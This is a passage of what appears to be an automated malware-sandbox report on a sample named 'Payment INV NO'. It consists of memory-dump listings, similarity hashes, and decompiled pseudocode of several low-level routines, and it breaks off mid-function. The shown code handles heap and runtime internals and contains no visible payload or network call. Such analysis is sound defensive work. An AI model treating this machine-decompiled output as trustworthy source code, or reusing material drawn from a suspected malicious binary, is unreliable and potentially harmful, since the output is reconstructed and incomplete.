                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f24f064d971c28525fce69558ac29cd9e5a2fee0d9dc4c2bf782e4b6e2518297
                                                          • Instruction ID: be684768bcf9360839f743dd48dbc51eb54fb80da3731cc070204bc3e7d4ff5d
                                                          • Opcode Fuzzy Hash: f24f064d971c28525fce69558ac29cd9e5a2fee0d9dc4c2bf782e4b6e2518297
                                                          • Instruction Fuzzy Hash: 2631B2B1A45245DFEF26DB6CD48C7ADFBF1BB49358F18818DC604A7241C330A988CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A1B8F Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E017A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017DBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017DA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017DA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = E017B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                          0x017a1b8f
                                                          0x017a1b9a
                                                          0x017a1b9c
                                                          0x017a1b9e
                                                          0x017a1ba3
                                                          0x017f7010
                                                          0x017f7010
                                                          0x00000000
                                                          0x017a1ba9
                                                          0x017a1ba9
                                                          0x017a1bae
                                                          0x00000000
                                                          0x017a1bc5
                                                          0x017a1bca
                                                          0x017a1bcf
                                                          0x017a1bd0
                                                          0x017a1bd1
                                                          0x017a1bd2
                                                          0x017a1bd6
                                                          0x017a1bdc
                                                          0x017a1be0
                                                          0x017f6ffc
                                                          0x017f7000
                                                          0x00000000
                                                          0x017f7006
                                                          0x017f7009
                                                          0x017f7009
                                                          0x017a1be6
                                                          0x017a1bec
                                                          0x017a1c0b
                                                          0x017a1c0b
                                                          0x017a1c0c
                                                          0x017a1c11
                                                          0x017a1c12
                                                          0x017a1c15
                                                          0x017a1c1b
                                                          0x017a1c1f
                                                          0x017a1c31
                                                          0x017a1c33
                                                          0x017f7026
                                                          0x017f7026
                                                          0x017a1c21
                                                          0x017a1c24
                                                          0x017a1c24
                                                          0x017a1bee
                                                          0x017a1bee
                                                          0x017a1bf2
                                                          0x017a1c3a
                                                          0x017a1bf4
                                                          0x017a1bf4
                                                          0x017a1c05
                                                          0x017a1c05
                                                          0x017a1c09
                                                          0x017a1c3e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a1c09
                                                          0x017a1bec
                                                          0x017a1be0
                                                          0x017a1bae
                                                          0x017a1c2e

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c54a81e033d902cef5f0e60f3de067332d51fd1cd12b303a2044570fa669057d
                                                          • Instruction ID: d229699cfcfaec9eb8662702271beaa5b1287ef628891d8ffd0dc8025ea5939c
                                                          • Opcode Fuzzy Hash: c54a81e033d902cef5f0e60f3de067332d51fd1cd12b303a2044570fa669057d
                                                          • Instruction Fuzzy Hash: 4721293B500229ABEB269E59C884F9BFBBDEFD1A60F854565FE048B304D630DC00D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CBC2C Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E017CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1886100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E017B2280(0xd, 0x7a9f1a0);
				_t41 =  *0x18860f8; // 0x0
				if(_t41 != 0) {
					 *0x18860f8 =  *_t41;
					 *0x18860fc =  *0x18860fc + 0xffff;
				}
				E017AFFB0(_t41, 0x800, 0x7a9f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x18860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = E017B4620(0x1886100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1886100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                          0x017cbc36
                                                          0x017cbc42
                                                          0x017cbc45
                                                          0x017cbc4a
                                                          0x017cbd35
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017cbc50
                                                          0x017cbc50
                                                          0x017cbc58
                                                          0x017cbc5a
                                                          0x017cbc60
                                                          0x00000000
                                                          0x00000000
                                                          0x0180a4f2
                                                          0x0180a4f6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0180a4fc
                                                          0x017cbc79
                                                          0x017cbc7e
                                                          0x017cbc86
                                                          0x017cbd16
                                                          0x017cbd20
                                                          0x017cbd20
                                                          0x017cbc8d
                                                          0x017cbc94
                                                          0x017cbcbd
                                                          0x017cbcca
                                                          0x017cbccb
                                                          0x017cbccc
                                                          0x017cbccd
                                                          0x017cbcce
                                                          0x017cbcd4
                                                          0x017cbcea
                                                          0x017cbcee
                                                          0x017cbcf2
                                                          0x017cbd00
                                                          0x017cbd04
                                                          0x00000000
                                                          0x017cbc96
                                                          0x017cbcab
                                                          0x017cbcaf
                                                          0x017cbd2c
                                                          0x017cbd2c
                                                          0x017cbd09
                                                          0x00000000
                                                          0x017cbd09
                                                          0x017cbcb1
                                                          0x017cbcb5
                                                          0x017cbcbb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017cbcbb

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 167a08bb88d24c5c190d168660a0b1679ae188548a0779e7ba2a46286b337de1
                                                          • Instruction ID: b760ea535049c25f8d019a94b7f4abe8a56246691ca12ad90d61fab09105dbd2
                                                          • Opcode Fuzzy Hash: 167a08bb88d24c5c190d168660a0b1679ae188548a0779e7ba2a46286b337de1
                                                          • Instruction Fuzzy Hash: 1C21F036A006069BCB21DF9CD4817AAB3B4FF18751F10007CED44EB246E774DA468B81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B8D76 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 97%
                                                          			E017B8D76(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t24;
				intOrPtr* _t26;
				char* _t27;
				intOrPtr* _t32;
				char* _t33;
				signed char _t43;
				signed char _t44;
				signed char _t52;
				void* _t56;
				intOrPtr* _t57;

				_t56 = __edx;
				_t57 = __ecx;
				if(( *(__edx + 0x10) & 0x0000ffff) == 0) {
					L14:
					_t52 = 0;
				} else {
					_t52 = 1;
					if(( *0x18884b4 & 0x00000004) == 0) {
						_t24 =  *(__ecx + 0x5c) & 0x0000ffff;
						if(_t24 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0x177ade8 + _t24 * 2) & 0x0000ffff) << 4) {
							goto L2;
						} else {
							asm("sbb bl, bl");
							_t44 = _t43 & 1;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t44 = 0;
					}
					L3:
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t26 != 0) {
						if( *_t26 == 0) {
							goto L4;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							goto L5;
						}
						L23:
					} else {
						L4:
						_t27 = 0x7ffe038a;
					}
					L5:
					if( *_t27 != 0) {
						L21:
						if(_t44 != 0) {
							L01851751(_t44,  *((intOrPtr*)( *((intOrPtr*)( *_t57 + 0xc)) + 0xc)),  *((intOrPtr*)(_t56 + 4)),  *(_t57 + 0x5c) & 0x0000ffff);
							_t52 = 1;
							goto L9;
						}
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t32 != 0) {
							if( *_t32 == 0) {
								goto L7;
							} else {
								_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								goto L8;
							}
							goto L23;
						} else {
							L7:
							_t33 = 0x7ffe0380;
						}
						L8:
						if( *_t33 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L9;
							} else {
								goto L21;
							}
						} else {
							L9:
							if(_t44 != 0) {
								goto L14;
							}
						}
					}
				}
				L10:
				return _t52;
				goto L23;
			}














                                                          0x017b8d7b
                                                          0x017b8d7d
                                                          0x017b8d89
                                                          0x017b8e01
                                                          0x017b8e01
                                                          0x017b8d8b
                                                          0x017b8d8d
                                                          0x017b8d95
                                                          0x017b8de1
                                                          0x017b8de8
                                                          0x00000000
                                                          0x017b8dfc
                                                          0x01800592
                                                          0x01800594
                                                          0x00000000
                                                          0x01800594
                                                          0x00000000
                                                          0x017b8d97
                                                          0x017b8d97
                                                          0x017b8d97
                                                          0x017b8d97
                                                          0x017b8d99
                                                          0x017b8d9f
                                                          0x017b8da4
                                                          0x0180059e
                                                          0x00000000
                                                          0x018005a4
                                                          0x018005ad
                                                          0x00000000
                                                          0x018005ad
                                                          0x00000000
                                                          0x017b8daa
                                                          0x017b8daa
                                                          0x017b8daa
                                                          0x017b8daa
                                                          0x017b8daf
                                                          0x017b8db2
                                                          0x018005e6
                                                          0x018005e8
                                                          0x018005fe
                                                          0x01800605
                                                          0x00000000
                                                          0x01800605
                                                          0x017b8db8
                                                          0x017b8dbe
                                                          0x017b8dc3
                                                          0x018005ba
                                                          0x00000000
                                                          0x018005c0
                                                          0x018005c9
                                                          0x00000000
                                                          0x018005c9
                                                          0x00000000
                                                          0x017b8dc9
                                                          0x017b8dc9
                                                          0x017b8dc9
                                                          0x017b8dc9
                                                          0x017b8dce
                                                          0x017b8dd1
                                                          0x018005e0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017b8dd7
                                                          0x017b8dd7
                                                          0x017b8dd9
                                                          0x00000000
                                                          0x00000000
                                                          0x017b8dd9
                                                          0x017b8dd1
                                                          0x017b8db2
                                                          0x017b8ddd
                                                          0x017b8de0
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ea1e015b09bde0a8c97cb176e86b6002f066e03d018f16cc839a42793b12edf
                                                          • Instruction ID: cb4a1eb11aa6236bba98a3bb8d7de4e0cbb57027b1765ddc8a7bb05aa04295ab
                                                          • Opcode Fuzzy Hash: 4ea1e015b09bde0a8c97cb176e86b6002f066e03d018f16cc839a42793b12edf
                                                          • Instruction Fuzzy Hash: 2421AD39241A80CFE7668B2CC4D4BB6B7E8EB59745F084497F982CB691D739D8C1C712
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CA61C Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E017CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1870220);
				E017ED08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1887b9c; // 0x0
				_t55 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E017ED0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1887b10 =  *0x1887b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x188536c; // 0x771a5368
					if( *_t51 != 0x1885368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1885368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x188536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E017CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
